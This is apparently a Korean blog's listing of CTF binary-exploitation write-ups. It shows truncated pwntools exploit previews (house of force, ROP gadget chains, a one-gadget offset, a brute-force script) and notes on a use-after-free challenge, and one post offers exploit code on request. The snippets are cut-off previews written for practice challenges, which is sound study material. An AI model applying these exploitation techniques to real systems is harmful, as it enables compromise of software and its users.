목록분류 전체보기 (53)
hOwDayS 선린 10720
보호되어 있는 글입니다.
exploit 코드가 필요하시면 연락 부탁드립니다. 문제 더럽습니다
house_of_force 이용 하장마지막에 /bin/sh exploit.py 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162from pwn import * p = process("./my_house")#p = remote("49.236.136.140",13000)e = ELF("./my_house") p.recv()p.send("A" * 256)p.recv() def hexdemical_c(c): a = process("./he_x") a.sendline(str(c)) return a.recv(8)#0xfc p.send("%x %x %x")p.r..
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263from pwn import * p = process("./easy_of_the_easy")#p = remote("49.236.136.140",14000)e = ELF("./easy_of_the_easy")pr = 0x080483f9pppr = 0x080489e9bss = 0x0804a040 +100 for i in range(0,200): p.recv() p.sendline("1") p.sendline("1") p.sendline("0") p.sendline("3")p.sendline("18899..
많이 돌려봐야 된다 주소가 0x00 에 배치되길 기다리며 RTJ 를 한다 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104from pwn import *import timeimport sys pppr = 0x080486f9#pppr = 0x8048693pr = 0x08048361main = 0x8048522 context.terminal = ['gnome-terminal','-x','sh','..
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879from pwn import * pop_RSI_R15 = 0x0000000000400a51main_read = 0x40099Emain = 0x400716oneshot = 0x45216 p = process("./cee")e = ELF("./cee") def SETTING(): p.recv() p.sendline("2018-11-15") ## KOREAN ## p.recv() p.sendline("-1") ## ENDLISH ## p.recv(..
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596from pwn import *import string#log = getLogger(__name__)fini_arry = 0x8049f0ccontext.terminal = ['gnome-terminal','-x','sh','-c'] e= ELF("./shellcoding") flag = '' while 1: include = False for i in string.printable:..
보호되어 있는 글입니다.
소개 대회기간때 Leak만하고 익스하는 법을 몰라 몇시간 동안 잡다가 롸업보고 풀었는데새로운 기법을 터득했다( __IO_2_1_stdin_) 보호 기법 RELRO FULL RELROStack CanaryCanary Found NX NX enabled PIE NO PIE 분석 바이너리 그대로 보면 ccloud() -> 익스 leak() -> 릭 Leak 1. leak()함수에 들어감 2. libc릭 할 수 있을 만큼 채운다 ( ret뒤에 바로 있다 ){ 카나리는 무시한다(익스 할때 필요 없음) } Exploit ccloud()에 들어감 여기서 는 계속 malloc , free 가 되서 힙익스도 할 수가 없다 *((byte *)buf + size -1)를 한다 예를들어 0x7ffff7dd1918 를 덮고싶을..
소개 오랜만에 작성한다UAF문제나오면 잘 몰라서 멍때렸다이 문제가 UAF기법에서 아주 좋은 문제 같다. 보호 기법 RELRO Partial RELROStack CanaryCanary Found NXNX Enabled PIENO PIE 분석 1. 생성 2. 수정Edit 할때 ptr를 만들어 ptr(전역변수) 유무 확인 후정보입력하고 적용할 것인지 확인를 한다. 3. 하나 출력 4. 모두 출력 Vulnerable 취약점은 Edit에서 발견 할 수있다. 정보 입력하고 n을 누른다 (ptr에 0을 안넣고 free만 한다.) 그리고 1번을 눌러 새로운 CAT을 만들면 전 ptr이 있던 위치에 할당한다 --> UAF Leak 1. Create New cat (any content) ( idx : 0) 2. Edit..